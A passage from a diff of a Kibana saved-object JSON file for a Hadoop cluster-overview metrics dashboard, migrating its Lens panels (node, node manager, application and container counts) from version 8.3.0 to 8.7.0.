"indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b98d7344-acd9-4e73-a62b-a34aee54465c", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5199984c-035a-4e47-9d4a-d63d01735d8b": { - "columnOrder": [ - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" - ], - "columns": { - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.nodes.lost: *" - }, - "isBucketed": false, - "label": "Lost Nodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.nodes.lost" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "b98d7344-acd9-4e73-a62b-a34aee54465c", - "key": "hadoop.cluster.nodes.lost", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.nodes.lost" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", - "layerId": "5199984c-035a-4e47-9d4a-d63d01735d8b", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } + "3708838a-0567-4295-8e77-3a39aca246cd": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.node_managers.num_decommissioned: *" + }, + "isBucketed": false, + "label": "Decommissioned", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.node_managers.num_decommissioned" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "9d55a200-501c-45bf-94a9-a3c36744865d", - "w": 8, - "x": 32, - "y": 0 - }, - "panelIndex": "9d55a200-501c-45bf-94a9-a3c36744865d", - "title": "Number of lost nodes [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1965ff1a-73c8-4f6c-be65-230190b5ca22", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5199984c-035a-4e47-9d4a-d63d01735d8b": { - "columnOrder": [ - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" - ], - "columns": { - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.nodes.unhealthy: *" - }, - "isBucketed": false, - "label": "Unhealthy Nodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.nodes.unhealthy" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1965ff1a-73c8-4f6c-be65-230190b5ca22", - "key": "hadoop.cluster.nodes.unhealthy", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.nodes.unhealthy" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", - "layerId": "5199984c-035a-4e47-9d4a-d63d01735d8b", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } + "39e015f6-e8f8-4a9a-80e3-2570606d310c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.node_managers.num_active: *" + }, + "isBucketed": false, + "label": "Active", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.node_managers.num_active" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "c4649608-0cba-486f-8aec-460655407f67": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "4b01387d-bd18-4e16-b860-005e4a71e957", + "key": "hadoop.cluster.node_managers.num_active", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.node_managers.num_active" + } + } }, - "gridData": { - "h": 5, - "i": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886", - "w": 8, - "x": 40, - "y": 0 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d846e0a6-42a9-4840-82e4-f217959a63fb", + "key": "hadoop.cluster.node_managers.num_unhealthy", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.node_managers.num_unhealthy" + } + } }, - "panelIndex": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886", - "title": "Number of unhealthy nodes [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-faa4a447-faac-4424-9e42-5a29b0ad1137", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6289f262-f60c-4d6c-9480-c8d037633755", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c26ffbdc-b9a3-4a13-870a-6e83389b4007", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "70536a90-2ac2-4561-a8ed-1d0b7897fb04", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "faa4a447-faac-4424-9e42-5a29b0ad1137": { - "columnOrder": [ - "55139a89-d014-4b5e-9195-8d7874ae4a47", - "aac01fd6-85b3-4678-a105-90b6bfef291a", - "2c271321-b9d9-4fc0-8bb4-0483f527c16b", - "88d60efa-e82b-43e6-bd18-e523c386af79" - ], - "columns": { - "2c271321-b9d9-4fc0-8bb4-0483f527c16b": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.applications.pending: *" - }, - "isBucketed": false, - "label": "Pending", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.applications.pending" - }, - "55139a89-d014-4b5e-9195-8d7874ae4a47": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "88d60efa-e82b-43e6-bd18-e523c386af79": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.applications.failed: *" - }, - "isBucketed": false, - "label": "Failed", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.applications.failed" - }, - "aac01fd6-85b3-4678-a105-90b6bfef291a": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.applications.running: *" - }, - "isBucketed": false, - "label": "Running", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.applications.running" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6289f262-f60c-4d6c-9480-c8d037633755", - "key": "hadoop.cluster.applications.running", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.applications.running" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "c26ffbdc-b9a3-4a13-870a-6e83389b4007", - "key": "hadoop.cluster.applications.pending", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.applications.pending" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "70536a90-2ac2-4561-a8ed-1d0b7897fb04", - "key": "hadoop.cluster.applications.failed", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.applications.failed" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "aac01fd6-85b3-4678-a105-90b6bfef291a", - "2c271321-b9d9-4fc0-8bb4-0483f527c16b", - "88d60efa-e82b-43e6-bd18-e523c386af79" - ], - "layerId": "faa4a447-faac-4424-9e42-5a29b0ad1137", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "xAccessor": "55139a89-d014-4b5e-9195-8d7874ae4a47", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "aac01fd6-85b3-4678-a105-90b6bfef291a" - }, - { - "axisMode": "left", - "forAccessor": "2c271321-b9d9-4fc0-8bb4-0483f527c16b" - }, - { - "axisMode": "left", - "forAccessor": "88d60efa-e82b-43e6-bd18-e523c386af79" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - "yTitle": "Applications" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "c50d822a-587a-4198-90c1-847fe7355fa1", + "key": "hadoop.cluster.node_managers.num_decommissioned", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.node_managers.num_decommissioned" + } + } }, - "gridData": { - "h": 18, - "i": "d78560b6-a798-4b6b-b702-252c1319af9c", - "w": 24, - "x": 24, - "y": 5 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "e78473e3-a006-46cf-bada-e75ab9c4b279", + "key": "hadoop.cluster.node_managers.num_lost", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.node_managers.num_lost" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "d78560b6-a798-4b6b-b702-252c1319af9c", - "title": "Number of applications over time [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "446aea27-ddc3-4f7b-8623-2fe664c9af1d", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { - "columnOrder": [ - "36a555dc-487f-4e1c-a3ae-2afa0f535519" - ], - "columns": { - "36a555dc-487f-4e1c-a3ae-2afa0f535519": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.containers.allocated: *" - }, - "isBucketed": false, - "label": "Containers Allocated", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.containers.allocated" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "446aea27-ddc3-4f7b-8623-2fe664c9af1d", - "key": "hadoop.cluster.containers.allocated", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.containers.allocated" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", - "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 5, - "i": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272", - "w": 8, - "x": 0, - "y": 18 + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "panelIndex": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272", - "title": "Number of containers allocated [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "022a0e4d-13e0-47d7-8fd4-7fc3671f864d", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { - "columnOrder": [ - "36a555dc-487f-4e1c-a3ae-2afa0f535519" - ], - "columns": { - "36a555dc-487f-4e1c-a3ae-2afa0f535519": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.containers.pending: *" - }, - "isBucketed": false, - "label": "Containers Pending", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.containers.pending" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "022a0e4d-13e0-47d7-8fd4-7fc3671f864d", - "key": "hadoop.cluster.containers.pending", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.containers.pending" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", - "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "layers": [ + { + "accessors": [ + "39e015f6-e8f8-4a9a-80e3-2570606d310c", + "09a20c96-905b-40c8-9c40-77bfb5edb5b7", + "3708838a-0567-4295-8e77-3a39aca246cd", + "02f59eb1-8c13-41d6-a537-58fb1f051f84" + ], + "layerId": "35726819-8a70-4f5e-b150-1626c191f380", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "xAccessor": "c4649608-0cba-486f-8aec-460655407f67", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "39e015f6-e8f8-4a9a-80e3-2570606d310c" + }, + { + "axisMode": "left", + "forAccessor": "09a20c96-905b-40c8-9c40-77bfb5edb5b7" + }, + { + "axisMode": "left", + "forAccessor": "3708838a-0567-4295-8e77-3a39aca246cd" + }, + { + "axisMode": "left", + "forAccessor": "02f59eb1-8c13-41d6-a537-58fb1f051f84" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true }, - "gridData": { - "h": 5, - "i": "3078cc84-cf45-47c1-9761-a2cf0be99c2e", - "w": 8, - "x": 8, - "y": 18 + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "3078cc84-cf45-47c1-9761-a2cf0be99c2e", - "title": "Number of containers pending [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" + "valueLabels": "hide", + "xTitle": "Timestamp", + "yTitle": "Node Managers" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d1592d8a-7e50-4768-a449-a05551db392d", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { - "columnOrder": [ - "36a555dc-487f-4e1c-a3ae-2afa0f535519" - ], - "columns": { - "36a555dc-487f-4e1c-a3ae-2afa0f535519": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.containers.reserved: *" - }, - "isBucketed": false, - "label": "Containers Reserved", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.containers.reserved" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d1592d8a-7e50-4768-a449-a05551db392d", - "key": "hadoop.cluster.containers.reserved", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.containers.reserved" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", - "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "589a1406-7ccf-49b7-a6b7-618841e3339b", - "w": 8, - "x": 16, - "y": 18 - }, - "panelIndex": "589a1406-7ccf-49b7-a6b7-618841e3339b", - "title": "Number of containers reserved [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - } - ], - "timeRestore": false, - "title": "[Metrics Hadoop] Cluster overview", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-cb235590-cd24-11ec-be30-1d9331f0b107", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:indexpattern-datasource-layer-35726819-8a70-4f5e-b150-1626c191f380", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:4b01387d-bd18-4e16-b860-005e4a71e957", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:d846e0a6-42a9-4840-82e4-f217959a63fb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:c50d822a-587a-4198-90c1-847fe7355fa1", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:e78473e3-a006-46cf-bada-e75ab9c4b279", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - "type": "index-pattern" + "title": "Number of node managers over time [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f", + "w": 8, + "x": 24, + "y": 0 }, - { - "id": "metrics-*", - "name": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f:b880f665-29b3-40b9-bd45-459f3105c645", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9d55a200-501c-45bf-94a9-a3c36744865d:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - "type": "index-pattern" + "panelIndex": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b880f665-29b3-40b9-bd45-459f3105c645", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "5199984c-035a-4e47-9d4a-d63d01735d8b": { + "columnOrder": [ + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" + ], + "columns": { + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.nodes.active: *" + }, + "isBucketed": false, + "label": "Active Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.nodes.active" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b880f665-29b3-40b9-bd45-459f3105c645", + "key": "hadoop.cluster.nodes.active", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.nodes.active" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", + "layerId": "5199984c-035a-4e47-9d4a-d63d01735d8b", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "9d55a200-501c-45bf-94a9-a3c36744865d:b98d7344-acd9-4e73-a62b-a34aee54465c", - "type": "index-pattern" + "title": "Number of active nodes [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "9d55a200-501c-45bf-94a9-a3c36744865d", + "w": 8, + "x": 32, + "y": 0 }, - { - "id": "metrics-*", - "name": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - "type": "index-pattern" + "panelIndex": "9d55a200-501c-45bf-94a9-a3c36744865d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b98d7344-acd9-4e73-a62b-a34aee54465c", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "5199984c-035a-4e47-9d4a-d63d01735d8b": { + "columnOrder": [ + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" + ], + "columns": { + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.nodes.lost: *" + }, + "isBucketed": false, + "label": "Lost Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.nodes.lost" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b98d7344-acd9-4e73-a62b-a34aee54465c", + "key": "hadoop.cluster.nodes.lost", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.nodes.lost" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", + "layerId": "5199984c-035a-4e47-9d4a-d63d01735d8b", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886:1965ff1a-73c8-4f6c-be65-230190b5ca22", - "type": "index-pattern" + "title": "Number of lost nodes [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886", + "w": 8, + "x": 40, + "y": 0 }, - { - "id": "metrics-*", - "name": "d78560b6-a798-4b6b-b702-252c1319af9c:indexpattern-datasource-layer-faa4a447-faac-4424-9e42-5a29b0ad1137", - "type": "index-pattern" + "panelIndex": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1965ff1a-73c8-4f6c-be65-230190b5ca22", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "5199984c-035a-4e47-9d4a-d63d01735d8b": { + "columnOrder": [ + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" + ], + "columns": { + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.nodes.unhealthy: *" + }, + "isBucketed": false, + "label": "Unhealthy Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.nodes.unhealthy" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1965ff1a-73c8-4f6c-be65-230190b5ca22", + "key": "hadoop.cluster.nodes.unhealthy", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.nodes.unhealthy" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", + "layerId": "5199984c-035a-4e47-9d4a-d63d01735d8b", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "d78560b6-a798-4b6b-b702-252c1319af9c:6289f262-f60c-4d6c-9480-c8d037633755", - "type": "index-pattern" + "title": "Number of unhealthy nodes [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 18, + "i": "d78560b6-a798-4b6b-b702-252c1319af9c", + "w": 24, + "x": 24, + "y": 5 }, - { - "id": "metrics-*", - "name": "d78560b6-a798-4b6b-b702-252c1319af9c:c26ffbdc-b9a3-4a13-870a-6e83389b4007", - "type": "index-pattern" + "panelIndex": "d78560b6-a798-4b6b-b702-252c1319af9c", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-faa4a447-faac-4424-9e42-5a29b0ad1137", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6289f262-f60c-4d6c-9480-c8d037633755", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c26ffbdc-b9a3-4a13-870a-6e83389b4007", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "70536a90-2ac2-4561-a8ed-1d0b7897fb04", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "faa4a447-faac-4424-9e42-5a29b0ad1137": { + "columnOrder": [ + "55139a89-d014-4b5e-9195-8d7874ae4a47", + "aac01fd6-85b3-4678-a105-90b6bfef291a", + "2c271321-b9d9-4fc0-8bb4-0483f527c16b", + "88d60efa-e82b-43e6-bd18-e523c386af79" + ], + "columns": { + "2c271321-b9d9-4fc0-8bb4-0483f527c16b": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.applications.pending: *" + }, + "isBucketed": false, + "label": "Pending", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.applications.pending" + }, + "55139a89-d014-4b5e-9195-8d7874ae4a47": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "88d60efa-e82b-43e6-bd18-e523c386af79": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.applications.failed: *" + }, + "isBucketed": false, + "label": "Failed", + "operationType": "last_value", + 